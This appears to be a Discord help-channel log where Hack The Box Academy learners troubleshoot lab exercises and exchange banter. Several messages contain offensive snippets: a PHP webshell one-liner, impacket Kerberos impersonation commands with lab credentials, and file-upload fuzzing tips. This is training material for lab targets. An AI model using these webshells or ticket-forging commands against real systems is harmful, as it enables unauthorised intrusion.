It means you've asked plenty of questions for me to discern enough about you on how to respond
#modules
fathom pendant
waxen totem
It means you've asked plenty of questions for me to discern enough about you on ...
marci out here performing psych analysis based on questions... don't even need OSINT
sonic plume
lmao
fathom pendant
marci out here performing psych analysis based on questions... don't even need O...
Habits
velvet gale
https://tenor.com/view/markiplier-what-the-hell-stan-twitter-excuse-me-wtf-gif-2...
You went through every stage of grief in <5 seconds lol
rustic sage
File upload attacks, whitelist filter
So basically I need to fuzz file extension to get a shell.
The module says to use burpsuite to and see the length of each response but I don't understand one thing. There's only two lengths for this question, 226 and 227
Most are 227, so why dont extensions that gave me 226 get accepted?
I'm checking extensions manually
Bc both lengths give me "only images allowed"
waxen totem
we were literally just talking about changing the permissions
sonic plume
look at the messages above
fathom pendant
@quasi wave
quasi wave
ok
sonic plume
were litterally saying this
quasi wave
I didn't see that hold on
fathom pendant
Bc both lengths give me "only images allowed"
You're looking for a slightly different message
Iirc you can order responses
I.e. large > small
Clicking the column name at the top
velvet gale
I didn't see that hold on
Lol no worries, just make sure you write down the answer for future use. This will happen every single time you try to ssh into a machine if you get a private key. Its very fundamental.
fathom pendant
https://tenor.com/view/markiplier-what-the-hell-stan-twitter-excuse-me-wtf-gif-2...
What if I told you 90% of my help the past few weeks is straight from memory
waxen totem
What if I told you 90% of my help the past few weeks is straight from memory
You gotta have a background in psych or something
sonic plume
i would get so frustated at some time lmao
fathom pendant
You gotta have a background in psych or something
A passing interest
waxen totem
Any experience with social engineering?
fathom pendant
3/5 on my AP psych exam in HS and my cybersec degree had me take a psych 101 course
People are just as important a factor (even fictional people in the case of htb academy targets) as the machine themselves
Like a lazy admin reusing an rsa key for root
woeful lake
That one got a promotion to client
quasi wave
I am playing with chmod but what chmod number do I need to give it? I have tried 700, 444, and 711
644 also won't work
because that's what it was before
sonic plume
google the error message, youll find the answer
velvet gale
Of course, so if 644 is too PERMISSIVE you have to make it more restrictive.
waxen totem
mans should really google before asking here
fathom pendant
I am playing with chmod but what chmod number do I need to give it? I have tried...
As i said early X00 should work, [1,2,4]00
fathom pendant
Also suggest removing it from your .ssh folder
Also what do you mean by it 'not working' with 700
If a key file is pw protected you'll have to input the password when using it, like a pw protected zip file
sonic plume
you want and should search what the numbers are meaning, the permissions. like xwr
velvet gale
I've provided some documentation for you @quasi wave . That should explain everything for you as far as linux file permissions and what the numbers mean.
You're are too open, you need to make them less open for other users on your system.
fathom pendant
Again this is basics he should have learned at some point
And should have taken notes of
worldly vortex
Anyone available for a quick nudge with the Intro to HTTP attacks TE.CL exercise? I've implemented the exploit as per the guide but I am getting Invalid HTTP Header: '0' error message, for some reason its parsing the size declaration of the empty chunk as a HTTP header
sonic plume
Again this is basics he *should* have learned at some point
ive been at that time too tbf, when i started hacking, cant really judge him tho
fathom pendant
ive been at that time too tbf, when i started hacking, cant really judge him tho
I can
sonic plume
i think everyone has
sonic plume
😟
velvet gale
Yeah, but hes a noob lol. Back in the day we used to get told RTFM and ST*U. Its a different world
waxen totem
ive been at that time too tbf, when i started hacking, cant really judge him tho
I'm still like that... skipping around, at least I know SOME fundamentals though
fathom pendant
It'd be different if it wasn't stuff he was told to take note of 1+ year ago
waxen totem
It'd be different if it wasn't stuff he was told to take note of 1+ year ago
crazy how you remember
velvet gale
Yeah I don't have that context that you do so I can definetly see your point. Annoying and frustrating.
waxen totem
I can't remember what I had for breakfast yesterday
sonic plume
lmfao
fathom pendant
crazy how you remember
Again. If I remember, it's a problem.
fathom pendant
I can't remember what I had for breakfast yesterday
Same
sonic plume
probably some people will never learn?
quasi wave
yay I'm logged in as mike via ssh
sonic plume
good job
waxen totem
probably some people will never learn?
velvet gale
There you go!
fathom pendant
Nah, I believe Mark can learn
It's why I'm actually helping instead of just "LOL good luck"
Which i have done with people in the past
waxen totem
Which i have done with people in the past
what would cause you to do this to someone?
velvet gale
Fixed mindset individuals
fathom pendant
what would cause you to do this to someone?
Complete obstinance, and only wanting answers not the path to the river.
Lead a horse to water and what not
Helping others here is also selfish to a degree, helps keep myself sharp by helping others
quasi wave
I got root password
waxen totem
Helping others here is also selfish to a degree, helps keep myself sharp by help...
Richard Feynman did say the best way to learn is to teach
quasi wave
I finished challenge
sonic plume
good job
waxen totem
I finished challenge
did you: TAKE NOTES?
sonic plume
im sure he did
waxen totem
If he didn't he'd be back here in a year asking the same thing about ssh keys
velvet gale
See ya in a year!
sonic plume
If he didn't he'd be back here in a year asking the same thing about ssh keys
i mean, he probably didnt know that is needed for id_rsa, but im sure he does know!
woeful lake
gg
velvet gale
I remember not knowing that though. Hes in a good stage of learning. This where you either stick it out or quit not too soon after, and if hes been in at i for a year, thats not really a bad sign.
Thats a + in my book, but I also don't know anything else then the 20 minutes I've been here. So that doesn't really mean much.
sonic plume
I remember not knowing that though. Hes in a good stage of learning. This where ...
thats what im saying, i know everyone has been though some stuff like that, and not knowing exactly why it needs to happen. if you just go like okay itll be like that you just forget it, ifyk what i mean
fathom pendant
Google goes a long way
sonic plume
Google goes a long way
i know, thats just a skill itself tho, researching, problemsolving. (hacking just solving problems over and over again). some ppl got to put more effort in than others
waxen totem
I remember not knowing that though. Hes in a good stage of learning. This where ...
I mean I learned this concept recently, reading through 0xdf's writeups
sonic plume
thats what im saying, i know everyone has been though some stuff like that, and ...
i mean ~1.5 years back, i didnt even know how to connect to vpn, (i tried all my efforts, but couldnt manage to connect) so i couldnt start htb/thm so i grinded portswigger labs 🤣
quasi wave
did you: TAKE NOTES?
yes
velvet gale
I feel like learning how to learn is a skill too right? I think that kind plays into learning "how to google". Thats fundamental
quasi wave
I feel like learning how to learn is a skill too right? I think that kind plays ...
learning how to learn is a form of intelligence in of itself
lmao good skill to have
waxen totem
I feel like learning how to learn is a skill too right? I think that kind plays ...
Agreed, also pretty sure academy has a learning process module for this
fathom pendant
Learning process is hit/miss tbh a bit of pseudoscience as well in it
waxen totem
Learning process is hit/miss tbh a bit of pseudoscience as well in it
I just skimmed through most of it...the questioning part was interesting though
sonic plume
I feel like learning how to learn is a skill too right? I think that kind plays ...
true, i usually compare hacking to math (for example), like you can learn all the theory, but if you dont know how to actually do that it’ll be complete useless. learning hacking is just by doing it
sonic plume
true, i usually compare hacking to math (for example), like you can learn all th...
ig thats personal tho, everyone learns diff i know
fathom pendant
In a closed system where the only issue is your own skill
waxen totem
You apply the theory to the practice
and if you can't, you go here to ask marci
fathom pendant
and if you can't, you go here to ask marci
Don't ask me specifically
I'll respond if I know. But if it's in the reading I'll straight up tell you to just read
waxen totem
Don't ask me specifically
teach us oh great experienced one
fathom pendant
teach us oh great experienced one
Most of what I know is what I read and applied from the modules, a handful from other sources
waxen totem
Most of what I know is what I read and applied from the modules, a handful from ...
I should really stop procrastinating on modules...
sonic plume
I should really stop procrastinating on modules...
same, mostly i just do the sa, checking if i know the contents or not and if so ill skip the rest of it
im really lazy
velvet gale
I would probably read it. Its really really good info. Trust me. Theres little nuggets in there.
fathom pendant
Yeah sometimes there's bits of info in there, like the process to identify something -- not just how to exploit
velvet gale
Even some administrative stuff, (how to configure) that really helps you put yourself in the mind of the Admin and what might be going on in the background that you don't necessarily see.
So when you're outside hacking your way in. You don't necessarily see everything thats going on explicitly. But you can intuitively guess whats happening by the responses you get. In other words you can see what you don't see.
It talked about that early in one of the modules.
fathom pendant
Yup
sonic plume
good point, all the sections are important, but its just me being lazy not the other things are irrelevant or so
velvet gale
Yeah i get it, and to be honest, if the information wasn't that great, I would lose interest and wouldn't read the whole thing. Just skim it. But since its actually useful information it caught my attention and I'm reading it. I'm not a huge reader.
mint niche
hi
dark hedge
i will say that the modules are interesting enough to keep me reading
mint niche
how is it going ?
fathom pendant
Yeah i get it, and to be honest, if the information wasn't that great, I would l...
struggle
complain
the thing you struggled with/complained about us mentioned in reading
dark hedge
how is it going ?
rustic sage
You're looking for a slightly different message
So rn i am NOT looking for a way to upload files with php code?
fathom pendant
how is it going ?
rustic sage
Bc the only thing I see for every response is "only images are allowed"
fathom pendant
So rn i am NOT looking for a way to upload files with php code?
You're looking for something that is accepted
The section should tell you what list to use
rustic sage
You're looking for something that is accepted
I literally get "only images are allowed" for all lists. I did not get one single file accepted from
Webxtensions.txt
Extensions.lst
Bash script with all of php extensions added at line 2 aka wordlist.txt
fathom pendant
I literally get "only images are allowed" for all lists. I did not get one singl...
There should be just a list provided with the php extensions
harsh gorge
brittle arch
I'm doing the RBCD (Linux) section from the Kerberos Attacks module. I've correctly created a machine account, and added the correct SPN. When I try and get the ST to do the impersonate I get this error:
`Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[] Requesting S4U2self
[-] Kerberos SessionError: KRB_AP_ERR_BADMATCH(Ticket and authenticator don't match)
`
Is this a timezone issue?
fathom pendant
Yeah looks like tz issue, faketime may work, you may have to disable auto time syncing in the vm to host
brittle arch
Exact same error:
`faketime "$(ntpdate -q 10.129.44.160 | cut -d ' ' -f 1,2)" impacket-getST -spn CIFS/DC01.INLANEFREIGHT.LOCAL -impersonate Administrator -dc-ip 10.129.44.160 inlanefreight.local/'HACKTHEBOX:Hackthebox123+!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[] Requesting S4U2self
[-] Kerberos SessionError: KRB_AP_ERR_BADMATCH(Ticket and authenticator don't match)
`
Perhaps a problem with the version on impacket?
lucid mortar
hey folks, I'm looking for some help with Kerberos Attacks Module > Unconstrained Delegation - Users section. I've attempted to run through the lab a number of times and ways but keep running into the same problem. I even followed the solution guide but it doesn't seem to work either. The issue I'm running into is when I run the printerbug.py command I'm not getting an acceptable TGS. I've tried this with dementor.py as well but with the same result. I'm not sure why this is failing 😦
(and yes I'm using the full hash)
brittle arch
hey folks, I'm looking for some help with Kerberos Attacks Module > Unconstraine...
I also had this problem, sorry, I don't know how to fix it. I ended up going back to Windows to finish the section.
vivid sigil
I also had this problem, sorry, I don't know how to fix it. I ended up going ba...
same, the kerberos module i skipped two sections that from linux
velvet gale
hey folks, I'm looking for some help with Kerberos Attacks Module > Unconstraine...
https://github.com/dirkjanm/krbrelayx/issues/10
Maybe try adding host flag?
vivid sigil
same, the kerberos module i skipped two sections that from linux
I just returned to windows section to solve them
velvet gale
I guess that would be a workaround. That makes sense since windows natively supports NTLM authentication
lucid mortar
wow glad to see I'm not crazy and this is a more common problem. I'll try playing with the host flag and report back
brittle arch
And let me know if you have the same issue I'm having with the RBCD section on Linux too
lucid mortar
And let me know if you have the same issue I'm having with the RBCD section on L...
just checked my notes; I was able to get this to work. ping me if you want to chat in more detail
oh if you're having a time sync issue (I've had that a few times on HTB machines) I always solve it with sudo ntpdate $machineIP
brittle arch
oh if you're having a time sync issue (I've had that a few times on HTB machines...
That didn't work.. I don't think it is a time issue, the time issue is usally CLOCK_SKEW
fathom pendant
depends what's throwing the error tbh but yeah
velvet gale
Yeah for krbrelay scenario, it uses NTLMSSP as a backup for when Kerberos doesn't work. Kerberos is very time dependent so if there is a clock skew and it doesn't work it will use NTLMSSP in this case, but if its not supported or disabled, then it will just throw the Unsupported MechType error. At least thats what I gathered. @brittle arch you might be facing a separate scenario.
lucid mortar
hmmm well now that you say that I didn't try syncing my time... let me give that a shot
brittle arch
Yeah for krbrelay scenario, it uses NTLMSSP as a backup for when Kerberos doesn'...
I don't know what my issue was.... but.. I just reset the instance, did the exact same thing and it worked.. so fml I guess?
velvet gale
Idk, these are old protocols old stuff going on, a bunch of MSFT nonsense to go on top of it. Just a recipe for disaster really lol
fathom pendant
typical Microsoft really
velvet gale
Imagine taking a dump 40 years ago. And let it sit there for a good 20 years of it and just adding on top of it more and more and until you get a nice heaping pile. A mix of old and new. And then make it proprietary and call it Windows
Instant trillionaire.
fathom pendant
NTLM was recommended to be disabled like at least 10+ years ago; and well here we are
velvet gale
Yeah well governments wont allow that because they are still using windows xp lol
fathom pendant
WIndows 3.1
velvet gale
Yeah and I bet you it does something crazy like launch missiles on an aircraft or something. Because, why not. 'Murica
fast cedar
hello i know this is not the right channel to ask for help but i am not able to chat on general channel like its shows you dont have permission to chat how can i get that
storm elk
hello i know this is not the right channel to ask for help but i am not able to ...
As with any discord server, read #welcome
fathom pendant
hello i know this is not the right channel to ask for help but i am not able to ...
||#welcome||
storm elk
if <#477042232109826048> only <#477042232109826048> there <#477042232109826048> ...
That lights up like my Christmas tree
fast cedar
ok it worked thanx a lot
fast cedar
As with any discord server, read <#477042232109826048>
thanx
formal sphinx
Is anybody having problem with smbmap on "Attacking Common Services " module?
fathom pendant
i never used or needed smbmap on that module
formal sphinx
Oh, ok
Bcs it is showing smbmap command, and i wanted to try it out, but i don't get any output, all i get is that connection is established, but that's it.
fathom pendant
i'm assuming you're using smbmap against the spawned target
maybe respawn the target
¯_(ツ)_/¯
formal sphinx
i'm assuming you're using smbmap against the spawned target
Ofc
fathom pendant
a fair bit of time HTB will snip output that's not relevant
formal sphinx
I can ping it, and i can do nmap scan on it
fathom pendant
can you do smbclient -N -L //ip
formal sphinx
a fair bit of time HTB will snip output that's not relevant
Oh, ok
I will try it now
fathom pendant
as that's literally the command above it
formal sphinx
Yes
fathom pendant
then it might just be an smbmap issue ¯_(ツ)_/¯
multiple ways to perform the same hting, i wouldn't get stuck too much on it
fathom pendant
are you using the apt binary or a cloned github version?
fathom pendant
i'm using the one installed in parrot and it's showing the same info
try reinstalling it?
sudo apt reinstall smbmap
fathom pendant
try sudo apt remove smbmap; reset your vm; reinstall it
formal sphinx
try sudo apt remove smbmap; reset your vm; reinstall it
Not working, will try now with github version
waxen totem
does it matter? there's like a billion ways to list smb shares
formal sphinx
not sure the differences to be honest
No, not working
wind moat
Not working, will try now with github version
I had the same issue, so i used only smbclient & crackmapexec . are you using kali linux in ur local vm ?
formal sphinx
I had the same issue, so i used only smbclient & crackmapexec . are you using ka...
yes
waxen totem
I had the same issue, so i used only smbclient & crackmapexec . are you using ka...
crackmapexec's outdated, recommend netexec
wind moat
netexec didnt work tho
waxen totem
nxc smb <target> --shares
didn't work?
wind moat
most of these tools didnt work for me in kali vm
i recommend u use pwnbox @formal sphinx
fathom pendant
that sounds more like your kali is borked
waxen totem
did you like... use the academy vpn?
wind moat
i tried github version, downloading from apt, and everything
waxen totem
cos I have fucked up before using the lab vpns for academy
wind moat
all versions seem to have some issues for me , 🙂
fathom pendant
did you like... use the academy vpn?
he can use the smbclient command
wind moat
smbclient works tho 🙂
waxen totem
which reminds me: time to update everything on my VM
formal sphinx
Problem is that i was using parrot on previous laptop, and on new one i can't use vmware properly
It runs good for about an hour and than the performance drops a lot until it freezes completely
fathom pendant
nxc worked fine for me
waxen totem
if it's a linux smb issue, you CAN use windows, it has the benefit of using file explorer as well for smb shares
fathom pendant
target is working as intended for me using pwnbox/parrot ¯_(ツ)_/¯
sounds like something potentially broke during an update or requires an update
river jetty
Hey I'm trying to find the parameters for this Skills Assessment - Web Fuzzing. I got the parameter but I can't seem to find the others.
formal sphinx
@fathom pendant You are using pwnbox as vm?
fathom pendant
yes
fathom pendant
Hey I'm trying to find the parameters for this Skills Assessment - Web Fuzzing. ...
are you sure there's multiple parameters to fuzz? i seem to recall only one
(and iirc it tells you)
river jetty
It also says "This method is no longer used" when I curl the page
The question is: In the page from the previous question, you should be able to find multiple parameters that are accepted by the page. What are they?
So I assumed that there's more than one.
fathom pendant
what module?
because that's not the web fuzzing module skill assessment...
https://academy.hackthebox.com/module/280/section/3140 <-- this is what i see for the "web fuzzing" module
unless you're talking about a different module
fathom pendant
ah that module is "attacking web applications with ffuf"
river jetty
Whoops
wind moat
there should be two params there
if u use the right wordlist , u should be able to find it
fathom pendant
yes there's 2 parameters, just because a method is no longer used doesn't make it invalid
it could still be usable; but updated to a different one
fathom pendant
you can't download pwnbox
you can download the htb-edition of parrotOS, but that's not the same as pwnbox
formal sphinx
you can download the htb-edition of parrotOS, but that's not the same as pwnbox
That's what i am downloading
vivid sigil
you can download the htb-edition of parrotOS, but that's not the same as pwnbox
if i download it, tools like impacket it will be there or should i download by myself ?
fathom pendant
impacket should be preinstalled
fathom pendant
Whoops
as another hint; the final question refers to using the POST method to submit via curl (this is important for how you'll fuzz)
rough violet
"In general, there are two types of services: internal, the relevant services that are required at system startup, which for example, perform hardware-related tasks, and services that are installed by the user, which usually include all server services."
what does "server service" mean in this context
waxen totem
"In general, there are two types of services: internal, the relevant services th...
server just refers to a computer that serves something, therefore server services refers to all system services that aren't there by default like an http server, an ssh server, etc.
rough violet
server just refers to a computer that serves something, therefore server service...
so network related servers,
waxen totem
so network related servers,
doesn't have to be network related, it could serve something just internally
like mpd
rough violet
doesn't have to be network related, it could serve something just internally
over localhost?
waxen totem
ye
river jetty
as another hint; the final question refers to using the POST method to submit vi...
And just like that. I finished it in like 2 seconds lol
fathom pendant
And just like that. I finished it in like 2 seconds lol
Figured I'd throw that bone to you bc i was like "how did I solve this the first time" turns out:
The key info was in the question
waxen totem
https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-...
having played multiple trading card games: no... reading it doesn't always explain the card
fathom pendant
having played multiple trading card games: no... reading it doesn't always expla...
It's mostly a meme tbh
fathom pendant
having played multiple trading card games: no... reading it doesn't always expla...
Yu-Gi-Oh be like that
waxen totem
Yu-Gi-Oh be like that
istfg yu-gi-oh
fathom pendant
Wall of text: the card game
waxen totem
sometimes a card's functionality isn't on the card but burried in a card that has been banished like 2 rounds ago
river jetty
Figured I'd throw that bone to you bc i was like "how did I solve this the first...
Lmao. Appreciate it! YuGiOh players defintitely dont read 😛
waxen totem
Lmao. Appreciate it! YuGiOh players defintitely dont read 😛
That's cos half the time we face meta players and know their exact combo
vivid sigil
you can download the htb-edition of parrotOS, but that's not the same as pwnbox
is Security Edition same as htb edition ? cuz when i try to download it gives me two choice home and security edition
cloud urchin
i believe the only difference is the theme, the htb edition is just themed like the pwnbox/htb
rough violet
the benz, the benz, the purple, the green the yellow the white cocaaine the white
hi tech
hi tec
hi tec
hasty mauve
bro's drunk
real delta
the benz, the benz, the purple, the green the yellow the white cocaaine the whit...
tf is that supposed to mean?
rough violet
tf is that supposed to mean?
it's the new hashing algorith VSHA-512-69 where V stands for very
safe star
tf is that supposed to mean?
yes
rough violet
they become much more of an issue because those networks are probably connected through cables to the main gateway (border gateway) router of the company?
or because mitm work on mac addresses but not IPs?
waxen totem
They become more of an issue because it's much easier to attack a network from within it
and rarely are networks with active hosts directly connected to the gateway router, there's usually a chain of em
rough violet
and rarely are networks with active hosts directly connected to the gateway rout...
sry dumb question but confusing me, what is "host" referred to in networks? is it like a server?
waxen totem
sry dumb question but confusing me, what is "host" referred to in networks? is i...
anything connected to the network that isn't a network device(i.e. router/switch...etc)
rough violet
and rarely are networks with active hosts directly connected to the gateway rout...
aight
rough violet
anything connected to the network that isn't a network device(i.e. router/switch...
oh aight
rough violet
anything connected to the network that isn't a network device(i.e. router/switch...
so the host is a guest
user, client
rough violet
can also be servers, printers, phones...
yes, got it now
rapid basin
i keep having this issue on the "responder" module,is that normal?
waxen totem
responder module? do you mean box?
rapid basin
yeah mb
fading stag
WHY CANT I TYPE IN GENERAL????
waxen totem
WHY CANT I TYPE IN GENERAL????
vocal kelp
Hi everyone, I am currently doing the fourth module of CDSA, Windows Event Logs and Finding Evil . Did anyone here face any issues while solving the answers to the questions of this module?
junior helm
Did you solve it?
fading stag
read <#477042232109826048> and <#569177628918022185>
who tf changed my name ?
its not randomized
and its chaos
waxen totem
don't look at me man, I don't have perms
fading stag
don't look at me man, I don't have perms
np ofc not
WHO CHANGED MY NAME
DONT LET ME @ EVERY SINGLE MEMBER
storm elk
Because your name did not abide by the rules.
fading stag
what rules
storm elk
Stop the caps and an at everyone won’t work
fading stag
bro its chaos
storm elk
The rules you’re supposed to read when joining a server
fading stag
i have read them
storm elk
It’s non English characters
acoustic owl
WHO CHANGED MY NAME
Read Rule #10
storm elk
Identify yourself with your identifier and it will open the general chat for you
And then your HTB username will be shown
storm elk
Account identifier can be found here: https://app.hackthebox.com/profile/settings
storm elk
can you just name it back as normal chaos
No
fading stag
I TOL you for god's sake i said i couldnt
storm elk
And why is that?
storm elk
Try again
fading stag
https://tenor.com/view/popcorn-michael-jackson-gif-11204209
XD man
acoustic owl
idk say error
You didn't even try, did you?
fading stag
fucking clown
fading stag
You didn't even try, did you?
i did
and the slow mod is just sitting on my nerves
shitty server
rename me back
acoustic owl
and the slow mod is just sitting on my nerves
calm down
real delta
bro fuck you, your just bullshiting me . ban my ass idgaf
Being mean to mods isn't very nice
fading stag
i dont need some one to teach me
storm elk
Well, it’s three simple steps to identify yourself
acoustic owl
Only you can rename yourself with a verification.
fading stag
Only you can rename yourself with a verification.
explain my name being changed
acoustic owl
explain my name being changed
Violation of rule 10
real delta
just name me CHAOS
Verify yourself so you can get your name changed
fading stag
Verify yourself so you can get your name changed
i said there is an error
storm elk
We can’t. Also , you asked to type in #general . you’re the only one who can identify yourself. If you get an error, tell us which one
fading stag
it shows caps ERROR
acoustic owl
it shows caps ERROR
You have to rename yourself. Your HTB username will be your Discord username.
real delta
i said there is an error
Then you didn't verify yourself properly
storm elk
Dm me a screenshot if you want.
waxen totem
Man, you mods must have some helpdesk experience dealing with karens XD
fading stag
Man, you mods must have some helpdesk experience dealing with karens XD
im not i just want my name bro wtf
i will report non English name as racism
real delta
storm elk
No
fading stag
not hard
storm elk
Identify yourself. If you don’t wanna identify yourself , that’s on you.
acoustic owl
One last time. We can't rename you. You have to rename yourself. Your HTB username will then automatically become your Discord username.
storm elk
Other than that, this isn’t a channel to chat. This is a channel for module help
real delta
i cant talk in general'
You need to verify to talk in #general
storm elk
i cant talk in general'
Buddy. We told you to identify yourself. Only then you can talk in general chat
fading stag
i said i tryed
storm elk
And I told you to dm me the screenshot of the error
If u want to be helped, listen to the ones trying to help
fading stag
just please i dont want to be mad, i get mad so much and i have a heart condition
storm elk
I’ll be waiting for that screenshot.
acoustic owl
Then let us help you. Verify your user and you will have the desired username and access to #general
storm elk
Account identifier can be found here: https://app.hackthebox.com/profile/settings
fading stag
just please i dont want to be mad, i get mad so much and i have a heart conditio...
XD Shut up
i made a new account
what now?
pseudo kiln
hey guys I got a question regarding LFI and File Upload module. For LFI I noticed we use <?php system($_GET['cmd']); ?> and call the cmd parameter with ?cmd=<command>. For file upload instead we use <?php system($_REQUEST['cmd']); ?> then call it with &cmd=<command> instead. The question is why ? I tried the file upload payload for LFI and it does not work. Is it something related to php ? I do not get it.
storm elk
hey guys I got a question regarding LFI and File Upload module. For LFI I notice...
The main difference between these two is (based on the text you wrote, module has been a while for me)
$_GET will only take the parameter from the url. $_REQUEST can also be a POST.
The difference between the ? And & is that the ? is the first parameter. So your second one it will be ?someparameter=somevalue&cmd=<command>
pseudo kiln
hmmmmm, I see still strange that $_REQUEST would not work for LFI then
storm elk
Which module and section are you working on? I’ll try to have a look on my phone
pseudo kiln
maybe it's finally time to go through w3schools php section, been putting it off for a while
pseudo kiln
Which module and section are you working on? I’ll try to have a look on my phone
It's specifically related to all the LFI assessments in the module. All the webshells I got working used $_GET. I could not get a single one to work with $_REQUEST. They do specifically show you to use $_REQUEST for File Upload webshells and $_GET for LFI webshells. But they never explain why
potent thorn
Anyone manage to get the petit potam exploit working in the Bleeding edge vulnerabilities section of Ad and enum?
I got the other two working just not petit potam
I get to the Requesting a TGT using gettgtpkinit.py step then it fails to get one from the kdc
calm abyss
hello, anybody did Game Reversing & Modding ?
I am stuck at Building a Runtime Hook
tender nimbus
Hey guys i'm stuck on the Windows Event Logs & Finding Evil module, i'm trying to do a DLL hijack on the calc.exe like in the module, the problem is that i can't move the calc.exe from the system32 dir i only can place my malisios dll in the dir but i can't name it WININET.DLL bcs there is already a file named like this, can't delete it as wel i need higher rights can somebody help?
shell solar
hi, has anyone made this section? save my time please what word lists do you use?
opal nexus
Hey guys i'm stuck on the Windows Event Logs & Finding Evil module, i'm trying t...
Try to copy the calc.exe from system32, not move.
tender nimbus
Try to copy the calc.exe from system32, not move.
just tried it it worked ^^ thanks
ripe wadi
guys how to knowif a box is buggy ir its skill issue
acoustic owl
When in doubt, I'd assume it's a skill issue.
ripe wadi
for example i was doing a machine for the attacking common services and the ftp service was bugged and it just didnt show the available files on the ftp sevrer, i was banging my head against the wall and after 3 restarts it finally showed it
acoustic owl
Did you wait a few minutes after starting each time? Some boxes take a few minutes to fully start up.
ripe wadi
the first one yeah i made around 10 scans just in case
acoustic owl
Scans? You said that the server did not display the files.
ripe wadi
Scans? You said that the server did not display the files.
ftp server
i scanned the machine ftp server around 10 times and the scan never showed available files
acoustic owl
Yes, but why scans?
You log in and the client then shows you the files on the server.
ripe wadi
well the third scan did show the files
can i paste what i am talking about to better ilustrate my point since i dont want one of the mods to warn me for pasting module content
acoustic owl
can i paste what i am talking about to better ilustrate my point since i dont wa...
please send me a dm
ripe wadi
ok
calm abyss
Unity Mono Win x64 6.0.0-be.672
zenith gazelle
Hi guys, happy holidays for everyone !!!
Anyone where did do or is doing the underpass machine ?
formal sphinx
Anyone where did do or is doing the underpass machine ?
I did it
acoustic owl
Anyone where did do or is doing the underpass machine ?
Best to ask in #1320087957612265574
steel snow
Hello, excuse me, i am experiencing a weird issue, which is connecting to the machine's website
it would work at the beginning but then, the connection dies
like after 2 minutes or so
i think in this specific module only but i don't know
which is get started
plush lotus
it would work at the beginning but then, the connection dies
are you using a vpn?
plush lotus
question. if i create an alias in my bash folder will it be able to be use in the vpn session
vague dust
so many new accounts on here lately
marsh thicket
i hope this isnt a stupid question but im new to HTB.
can someone explain what it wants me to do here?
vague dust
i hope this isnt a stupid question but im new to HTB.
can someone explain what ...
ah you are logging in via ssh
marsh thicket
ah you are logging in via ssh
yes. is this a task im supposed to do?
vague dust
did you spawn the target (if there is one) a little bit lower on that page
marsh thicket
oh yhh i spawned it
vague dust
try to ssh into that target
marsh thicket
whats the download file for?
vague dust
thats for when you want to use your personal VM
but if you are using HTB pwnbox then you dont have to download that file
marsh thicket
oh so i can just ignore it, spawn the pwnbox and answer the questions below here right?
vague dust
yup!
marsh thicket
ssh 10.129.127.54@htb-student
its like this right?
sinful ginkgo
vague dust
errrr
sick depot
anyone know why on the bleeding edge vulns module when i want to execute print nightmare msf console wont bind to the ip ? [-] Handler failed to bind to 172.16.5.225:8080:- -
[*] Started reverse TCP handler on 0.0.0.0:8080
marsh thicket
It worked now i got it in the wrong order 😆
vague dust
lol you are now on your way lil hacker
plush lotus
ok what am i missing.
vague dust
probably the unit name with the description
plush lotus
so do i need to pipe that into find
vague dust
well. look at your command. is there a command to list ALL the units?
plush lotus
ah
fathom pendant
Don't share answers
fathom pendant
If it highlights green, the answer is correct
marsh thicket
If it highlights green, the answer is correct
how comes i didnt recieve a cube whereas the bottom answer i did recieve a cube?
vague dust
cause it said +0
marsh thicket
ahh ok i see now
sick depot
can i dm someone for help with the bleeding edge vulns module
dim ridge
Im stuck on this one Burp Intruder. I get 404 back for every request sent -
https://academy.hackthebox.com/module/110/section/1054
Can anyone help?
fathom pendant
Im stuck on this one Burp Intruder. I get 404 back for every request sent -
htt...
Are you fuzzing for /admin/page.html?
lucid mortar
hmmm well now that you say that I didn't try syncing my time... let me give that...
still no luck; any additional help would be greatly appreciated
dim ridge
yeah, one sec will get a screenshot
fathom pendant
The question tells you which directory to start with
fathom pendant
yeah, one sec will get a screenshot
Did you also try sorting by response size?
Or status code
fathom pendant
Ah you did something wrong
Look at your request
It's requesting /page.html
Not /admin/page.html
dim ridge
But shouldn't it go from Admin from the target i provided
or does that have to be in the request header too
fathom pendant
It has to be in the header
dim ridge
ah 🤦♂️
fathom pendant
Your setting should autoupdate it
dim ridge
thank you one again Marcilee, i will make the change and fingers crossed its one of the first results
fathom pendant
But idk why it isn't
dim ridge
So this should work?
fathom pendant
So this should work?
Should
vague dust
try it and see what happens 😄
dim ridge
haha the thing is @vague dust you can sit there for hours and get the same results because its throttled to 1 request per sec
vague dust
haha the thing is <@1171287186172293212> you can sit there for hours and get the...
i know, i did at least half the bug bounty hunting path.
terse sedge
In Footprinting lab, Medium, I can't cd into the TechSupport folder, it says "Permission denied". I did use sudo when mounting the network share: sudo mount -t nfs 10.129.212.78:/ ./target-NFS/ -o nolock. It has "nobody" and "nogroup" as ownership.
fathom pendant
In Footprinting lab, Medium, I can't cd into the TechSupport folder, it says "Pe...
Move around as root
vague dust
haha the thing is <@1171287186172293212> you can sit there for hours and get the...
did you do the lucky button yet?
dim ridge
the AD one is already a slog, i was hoping that would be the worst of it
plush lotus
well. look at your command. is there a command to list ALL the units?
thank you. i still had to use grep to find the answer though
vague dust
thank you. i still had to use grep to find the answer though
yay you found a work around!
plush lotus
yay you found a work around!
i am sure there was a better way then systemctl --all list-units --type=service | grep -i [apparmor]
dim ridge
Should
